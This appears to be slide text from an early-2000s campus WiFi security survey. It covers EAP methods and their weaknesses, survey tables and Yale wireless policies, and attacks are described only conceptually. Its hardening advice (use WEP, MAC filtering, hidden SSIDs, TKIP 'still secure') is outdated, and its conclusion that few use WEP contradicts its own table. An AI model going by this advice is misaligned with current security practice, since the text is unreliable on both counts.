Description: Register the physical (MAC) addresses of authorized devices.

Flaws:
1. Must be registered in a list in each AP or in a server (e.g. a special RADIUS server).
2. Physical addresses are sent in the clear in every frame and can easily be spoofed (sniff an authorized MAC, then set it on the attacker's card).

Non-Proprietary Wireless Security

VPN (with or without filtering/blocking of non-VPN traffic)

Description: Tunnel all wireless traffic through VPN sessions. Require a VPN connection to a specific VPN server. Provides confidentiality, integrity & authentication.

VPN (PPTP, L2TP, IPSEC) choice.

Potential Flaws:
1. Redundant encryption (if also using WEP).
2. Bandwidth hog / latency problem.
3. The WLAN itself stays open, so anything not forced into the tunnel (local-subnet traffic, DNS, the interval before the tunnel is up) is unprotected.

Non-Proprietary Wireless Security

802.1X – port-based access control that carries the Extensible Authentication Protocol (EAP). Designed for wired AND wireless LANs. Can filter or enable ports and/or MAC addresses on switches and APs. Not a cipher. Not a single authentication method:

EAP-MD5
EAP-Cisco Wireless (aka LEAP)
EAP-TLS (Microsoft, RFC2716)
EAP-TTLS
PEAP (Microsoft and Cisco)
EAP-SIM proposal (use GSM SIM cards)

Non-Proprietary Wireless Security

802.1X -- EAP Authentication “bucket”

EAP-MD5

Description: CHAP-style challenge/response; the client returns MD5(id || password || challenge), relayed to RADIUS.

Flaws: No key management (uses static WEP keys). One-way only: the server is never authenticated, so a rogue AP can collect responses and run an offline dictionary attack on them.

Non-Proprietary Wireless Security

802.1X -- EAP Authentication “bucket”

EAP-CISCO WIRELESS (LEAP)

Description: Username/password credentials (MS-CHAP-style challenge/response) passed to RADIUS.

Benefits:
generates one-time WEP keys for each session;
can use RADIUS timeout features to force re-keying and so blunt current WEP attacks;
prevents rogue AP association attacks (by mutual authentication requirement).

Flaws or Drawbacks: Needs a special 802.11b driver to support LEAP. The challenge/response is exchanged in the clear, so a captured exchange is open to an offline dictionary attack on the password (the ASLEAP tool); Cisco's own guidance is strong passwords or migration to EAP-FAST/PEAP.

Non-Proprietary Wireless Security

802.1X -- EAP Authentication “bucket”

EAP-TLS (Microsoft, RFC2716)

Description: uses X.509 certificates on both client and server for mutual authentication; the TLS handshake carries the certificates.

Benefits: generates one-time WEP keys for each session (derived from the TLS master secret), as LEAP does.

Flaws or Drawbacks: Needs a special 802.11b driver/supplicant on clients (supplicants are available for some Linux distros and all non-CE Windows).

Drawback – requires a PKI & per-user (or per-machine) certificates. Microsoft Certificate Server and the AD LDAP server can be used in an Active Directory environment.

Non-Proprietary Wireless Security

802.1X -- EAP Authentication “bucket”

PEAP (Microsoft and Cisco)

Description: Similar to EAP-TLS but authenticates the user with a username/password rather than a client certificate. The server still presents a certificate; the TLS tunnel it sets up protects the inner credential exchange (typically MS-CHAPv2).

Benefits: generates one-time WEP keys for each session, as LEAP does. A PKI and user certificates are not required (one server certificate is).

Flaws or Drawbacks: Needs a special 802.11b driver/supplicant on clients (available, particularly for Windows XP SP1). The security rests on the client validating the server certificate: if the supplicant is configured to accept any certificate, a rogue AP with its own RADIUS server can terminate the tunnel and capture the MS-CHAPv2 exchange for offline cracking.

Proprietary Wireless Security Systems

Aruba
BlueSocket
Ecutel
ReefEdge
Vernier

Survey: Which WLAN security modes are you using (check all that apply):

1. None
2. MAC Address Filtering
3. Application Level (SSL)
4. VPN
5. Proprietary
6. WEP
7. WPA
8. 802.1x
9. 802.11i
10. EAP

EAP Modes:

A. EAP-MD5
B. LEAP (Cisco)
C. EAP-TLS (Microsoft, RFC2716)
D. PEAP (Microsoft, Cisco)
E. Other EAP (EAP-SIM, TTLS)

# of Respondents with WiFi Access?

[Bar chart: Yes vs. No; counts not recoverable from the extracted text.]

Publish Campus WiFi Information on Web?

            SSID?   Hotspot Map?
Yes         9       10
No          6       5

Campus WLAN Mode

[Bar chart over IBSS / BSS / ESS; extracted values "112 4" with the first two counts fused, most plausibly IBSS 1, BSS 12, ESS 4.]

# WiFi WLAN Standards implemented

            802.11a   802.11b   802.11g   Super-G
Yes         4         15        7         0
No          12        1         8         15

WiFi Encryption / Authentication Modes

            WEP   WPA   802.1X
Yes         10    1     7
No          5     14    8

802.1X Authentication Protocols Implemented

[Bar chart, Yes/No per method: EAP-MD5, LEAP (Cisco), PEAP, EAP-TLS, TTLS; counts not recoverable from the extracted text.]

Commercial Secure WiFi Vendor Implementations

Implemented   1    (BlueSocket)
Evaluating    1    (Perfigo)
No            13   (None)

WLAN / Campus Network Topology Independence

            WLAN VLAN   Private IP   Non-campus   Campus Public
Yes         12          5            6            9
No          3           10           9            6

Net Sec Access Control – Firewall between WLAN &

            Campus Net   Internet
Yes         4            8
No          11           6
Not Yet     0            1

VPN Session Required from WLAN to connect to:

            Outside of WLAN   Campus Net
Yes         2                 3
No          12                12
Not Yet     1                 0

WLAN Data Link Layer Security Protections

            MAC ACLs   Anti Spoof   Private SSID   No ID Bcast
Yes         6          2            3              5
No          9          13           12             9
Not Yet     0          0            0              1

WLAN Security Counter-Measures

            Force WAP Associations   Jamming Capability
Yes         5                        0
No          10                       15

WLAN Authentication 1

            Allow Unauth   NetReg DHCP   Web Logon   802.1X Logon
Yes         1              8             6           6
No          14             7             9           8
Not Yet     0              0             0           1

WLAN Authentication 2

            X.509 Certs   SmartCard   VPN Auth
Yes         1             0           2

WEP/WPA Encryption

[Bar chart, Yes/No/Not Yet per mode: WEP 40 Static, WEP > 64 Static, WEP 40 Dynamic, WEP > 64 Dynamic, WPA 128 Static, WPA 128 & 802.1X; counts not recoverable from the extracted text.]

Encryption Requirement by WLAN Protocol Layer

            Application   Session   Transport   Network   Data Link
Don't Care  5             4         5           5         5
Recommend   6             6         2           2         2
Require     2             3         5           5         5

WLAN Policies 1

            RF Airspace Reserved   Require Non-IT WAP Stds
Yes         8                      6
No          7                      7
N / A       0                      2

WLAN Policies 2 - Allow WLANs outside IT?

            Non-IT Dept WAPs   Faculty WAPs   Student WAPs
Yes         5                  4              3
No          10                 11             12

Interesting or Unique Practices and Findings

Not all devices support > 64-bit WEP, so 40-bit must often be used.

A few campuses are moving from Cisco LEAP to PEAP or EAP-TLS.

Rutgers is using BlueSocket: http://ruwireless.rutgers.edu/

Dartmouth has widespread WiFi and VoIP over WiFi.

Several campuses use NoCat for both wired and wireless authentication (and thereby enable access).

More Interesting/Unique Practices and Findings

Companies are marketing for-pay public WiFi access points which you can hang off of any high speed Internet connection. These boxes allow users passing by to associate and pay for access by credit card. Look for students to try to make $$$?

Other Interesting/Unique Practices and Findings?

Yale University - Unwritten Wireless Policy

Do no harm: Private wireless access points which cause network disruption at Yale will be removed from the network (this includes causing interference by overlapping RF channels, etc).

Use of WEP or WPA is encouraged.

Private access points should not use the Yale SSID.

WiFi users are encouraged to use the VPN to access critical apps or sensitive information.

Yale administrative users should not use WiFi to replace wired LAN connections. (The above admin apps should already, however, be using application-level security on wired networks.)

Yale School of Medicine Wireless Policy Points

All private WAPs need to be registered. The default SSID must be changed to something other than Yale's and the default passwords must be changed.

The WAP must only allow WEP-encrypted connections (no open association) and should implement MAC address filtering.

It should be turned off if/when not used.

Yale School of Medicine Wireless Policy Points

Official YSM WiFi security: ePHI should not be transferred unencrypted.

YSM ITS WLANs are changing from VPN (either PPTP or IPSEC) recommended to required. DHCP will vend an RFC 1918 private IP on the YSM WLAN. Users must authenticate to the VPN and use it to connect to any resources outside of the WLAN.

Clients without registered MAC addresses or valid VPN sessions attempting HTTP connections to addresses outside the WLAN VLAN are redirected to a web portal where documentation and software are available (but little else).


WiFi Security Pre-WPA/802.11i Guidelines for Enterprise IT

Disable SSID broadcasts & use a non-obvious SSID.
Use WEP.
Use a separate VLAN & private IP net for the WLAN.
Firewall the WLAN off from the corporate intranet.
Require use of a VPN to enter the corporate intranet.
Use MAC address filtering – block non-registered addresses.
Force client association – to a known SSID.
Monitor the airspace – war-walk/chalk/drive/run yourself, AND look into WiFi perimeter protection products and systems.
Use 802.1X layer-2 authentication with EAP & RADIUS.


What WPA and 802.11i Provide:

Strong integrity (the Michael MIC under WPA, CCMP under 802.11i, instead of WEP's CRC-32).

Strong encryption (particularly AES-CCMP vs. the WEP RC4 implementation); dynamic key generation/re-generation.

Strong authentication capability (w/802.1X/EAP).

Caveat on DoS: neither WPA nor 802.11i authenticates management frames, so dis-association/de-authentication floods still work; TKIP's MIC countermeasures (a 60-second shutdown after two MIC failures) add a DoS lever of their own.

What is WPA2?

WPA2 == 802.11i. WPA2 & 802.11i include AES; WPA2 is basically (WPA + AES-CCMP). WPA does not include AES and uses TKIP. WPA is still considered secure (no practical break of TKIP is known, but it is a stop-gap built on RC4 for old hardware). AES is the FIPS-approved cipher (FIPS 197) needed for FIPS 140-2 validated products (required by some government agencies). AES can require new hardware or hardware upgrades as it can require a new dedicated crypto chip. Several WiFi vendors are now "WPA2" compliant:

Conclusions

Few are using WEP; some are now starting to evaluate WPA (and wait for 802.11i).

Some use of commercial solutions (Vernier, Aruba, some ReefEdge and BlueSocket)?

Some interest is beginning in "network admission" programs (require both authentication and a network scan, as in the UCONN NetReg mods) for both wired and wireless LANs: Cisco, Perfigo, StillSecure and Bradford Campus Manager.

Questions